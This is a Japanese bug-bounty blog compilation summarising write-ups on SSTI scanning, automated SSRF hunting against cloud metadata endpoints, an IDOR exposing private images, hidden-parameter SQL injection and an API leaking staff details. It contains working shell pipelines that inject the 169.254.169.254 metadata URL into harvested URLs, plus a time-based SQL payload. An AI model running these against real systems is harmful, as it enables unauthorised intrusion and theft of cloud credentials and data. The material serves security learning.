Hello there, ('ω')ノ
WSTGを翻訳しながらまとめていると、どうも読みづらくて。
原因は、文章内のインデントやサブタイトルが項番がないので。
どこからどこまでが一つのまとまりなのかがわかりづらく。
自分なりに色付けしたり段落をつけて工夫してみたりと。
そうしているうちに下記のタイトルの中に。
Backslash Powered Scannerとあったので使ってみることに。
4.7.18 Testing for Server-side Template Injection
さっそく、Burp Suiteの拡張機能からインストールして。
ベーシックなSSTIのページにアクセスして。
パラメータにペイロードを投げるので、アクティブスキャンをしてみると。
下記のように検出されて。
念のため、リピータでSendしてレスポンスを確認することに。
Best regards, (^^ゞ
Hello there, ('ω')ノ
フルオートメーションによるSSRFの検索を。
脆弱性:
SSRF
記事:
https://notifybugme.medium.com/finding-ssrf-by-full-automation-7d2680091d68
今回は、ssrfの脆弱性を自動化して。
個人情報のアマゾンメタデータ、ec2、クラウドサービスをリークすることで。
ssrfの脆弱性を見つける方法について説明することに。
自動化によるSSRFバグを探す場合のヒント:
必要なツール:
gf (tomnomnom)
https://github.com/tomnomnom/gf
qsreplace(tomnomnom)
https://github.com/tomnomnom/qsreplace
ffuf
gau(Corben)
waybackurls(tomnomnom)
https://github.com/tomnomnom/waybackurls
Case#1:curlとbashを使用するだけで自動化されたSSRFメタデータへのアクセス
ここでは、ssrfによる内部メタデータへのアクセスを取得して。
Wayback MachineからすべてのURLを収集して。
ssrfによる内部データへのアクセスを探して。
ターゲットをtargetme.comと仮定すると。
ここで、内部メタデータにアクセスするための。
ssrfを見つけるプロセスを処理することに。
URLを取得するためのコマンド:
waybackurl targetme.com >> blindssrftesturl.txt
gau -subs targetme.com >> blindssrftesturl.txt
cat blindssrftesturl.txt | sort -u | anew | httpx | qsreplace ‘http://169.254.169.254/latest/meta-data/hostname’ | xargs -I % -P 25 sh -c ‘curl -ks “%” 2>&1 | grep ”compute.internal” && echo “SSRF VULN! %”’
Case#2:curlとbashを使用するだけで自動化されたブラインドSSRFの発見
ここで、ブラインドssrfを探すために。
ブラインドssrfをテストするためのすべてのURLを取得する必要があって。
それは、Wayback MachineからURLを取得できて。
ターゲットをtargetme.comと仮定すると。
ブラインドssrfを見つけるプロセスを処理することに。
URLを取得するためのコマンド:
waybackurl targetme.com >> blindssrftesturl.txt
gau -subs targetme.com >> blindssrftesturl.txt
すべてのURLを取得した後にすべてのURLを並べ替えて解決し、誤検知を削除して。
cat blindssrftesturl.txt | sort -u | anew | httpx | tee -a prefinal_ssrftesturl.txt
ここで、ssrfに対して脆弱なパラメータを持つすべてのURLを。
抽出するためにgfを使用して。
cat prefinal_ssrftesturl.txt | gf ssrf >> final_ssrftesturl.txt
最後に、FFUFとBurp collaborator serverを使用して。
もしくは、pingb.inを使用して自動化することもできて。
cat final_ssrftesturl.txt | qsreplace “Burp collaborator server” >> ssrf_auto-ffuf.txt
ffuf -c -w ssrf_auto-ffuf.txt -u FUZZ
次に、DNSpingbackが、Burp collaborator serverに。
ヒットしていないかどうかを確認して。
pingが返ってきたら、内部ポートスキャンに進むことに。
Best regards, (^^ゞ
Hello there, ('ω')ノ
IDOR公開画像CDNリンクを。
脆弱性:
IDOR
記事:
https://susanwagle.medium.com/idor-revealing-images-cdn-links-6589e19bdbaf
今回は、redacted.comと呼ぶことに。
redacted.comには、サブドメインがあって。
それは、人々がクエリを投稿してコメントを介して回答できるサブドメインで。
something.redacted.com
興味深いことの1つは、マークダウンエディタがもあったことで。
画像をアップロードしてコメントを追加すると。
マークダウンエディタが下記のように表現されていることに気づいて。
[IMAGE]ID[IMAGE]
画像IDを変更してコメントを投稿すると。
他の人の画像のCDNリンクに直接アクセスできて。
また、人々が削除した画像とすべてのプライベート画像にもアクセスできて。
(CDNサーバから実際に削除されたものではなく)
Best regards, (^^ゞ
Hello there, ('ω')ノ
非表示パラメータを介したSQLインジェクションを。
脆弱性:
SQLインジェクション
記事:
https://hajarerutik9.medium.com/sql-injection-via-hidden-parameter-6da7699248fc
調査結果:
ターゲットは商社で、redacted.comと呼ぶことに。
ターゲットに登録するとダッシュボードにリダイレクトされて。
リクエストをチェックするためにBurp Suiteを実行して。
ページを更新して確認したところ、何も面白いものは見つからず。
また、Webアプリでは。
取引レポートを表示/ダウンロードできるオプションがあったので。
サンプルレポートを生成して、Burp Suiteの実行中にダウンロードすると。
レポートをダウンロードするためにWebアプリが。
銀行ID、ユーザIDなどを取得するようにリクエストしていることがわかって。
POST /redacted.com/withdraw/unbankacc
多くのリクエストを確認すると、下記のリクエストがあって。
下記のリクエストのリソースにアクセスするには。
トークンを提供する必要がありますとの応答が。
しかしながら、自分は持ってないので。
次に、ディレクトリをブルートフォースしてみると。
Dir Buster
DirB
WFuzz
Dirsearch
など。
下記の有効なディレクトリ「bankacc」を見つけて。
しかしながら、応答は空で。
POST /redacted.com/withdraw/bankacc
なので隠されたパラメータを見つけることを考え、Param Minerを実行することに。
結果、statusというパラメータを見つけることができたので。
任意の値を送ってみるとSQLエラーが発生したので。
POST /redacted.com/withdraw/bankacc?status=some123
下記のインジェクションを試すことに。
1' AND sleep(5)
すると5秒の遅延を取得し、脆弱性を確認できて。
すぐにsqlmapを起動して、このリクエストを渡すと。
1分以内に私はそこにすべてのデータベースをダンプすることができて。
小さなヒントは、隠されたパラメータで。
SQLインジェクションを試すことを忘れてはならず。
Best regards, (^^ゞ
Hello there, ('ω')ノ
サポートチケットシステムに関するスタッフ情報の開示を。
脆弱性:
情報開示
記事:
サポートチケットシステムとは。
チケットは、ソーシャルメディア、ライブチャットやメッセージング、電子メール。
または会社のWebサイトに設定したカスタマーサポートポータルなど。
さまざまなチャネルから取得できて。
カスタマーサービスへのオムニチャネルアプローチによって。
企業はすべてのチャネルからのリクエストを整理して。
それらを1つの包括的なダッシュボードにまとめることで。
チケットワークフローを合理化できて。
オムニチャネルチケットシステムは、任意のチャネルからのクエリを可能にして。
サポートチケットシステムは、組織全体の顧客の会話を可視化してて。
サポートチームが協力してクエリを解決したり。
チケットから関連する洞察を引き出したりできるようにして。
このバグをどのように見つけたかというと。
APIのハンティングの脆弱性が好きで。
サイドバーのナビゲーションに「サポートチケット」が表示されているので。
開いて発行して、スタッフからの返信するのを待つことに。
その後、自分の個人情報がAPIで返されたという応答を確認して。
さらに、Burp Suiteは、開示された電子メールアドレスを検出して。
下記のIssuesで、「電子メールアドレスが開示された」とのことで。
「/api/***/ tickets」で開示されているメールアドレスの問題で。
Burp Suiteは2通のメールを受け取っていて。
1通目は自のメールで、2通目はスタッフのメールで。
しかしながら、開示された電子メールだけではなくて。
下記は、スタッフの返信で。
下記の応答をみると。
アカウントの作成日、電子メール、携帯電話番号、2FAピン、IPアドレスなどを。
確認できて。
Best regards, (^^ゞ
